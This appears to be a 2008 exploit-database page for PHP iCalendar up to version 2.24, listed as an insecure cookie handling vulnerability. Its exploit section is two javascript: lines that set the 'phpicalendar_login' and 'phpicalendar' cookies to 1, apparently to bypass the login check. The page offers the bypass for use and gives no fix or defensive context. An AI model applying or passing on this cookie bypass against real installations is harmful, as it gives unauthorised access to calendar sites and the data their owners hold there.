[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
# Published : 2008-09-22
# Author : Stack
# Previous Title : WSN Links 2.20 (comments.php) SQL Injection Vulnerability
# Next Title : BuzzyWall <= 1.3.1 (search.php search) SQL Injection Vulnerability


###############################################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";

# www.Syue.com [2008-09-22]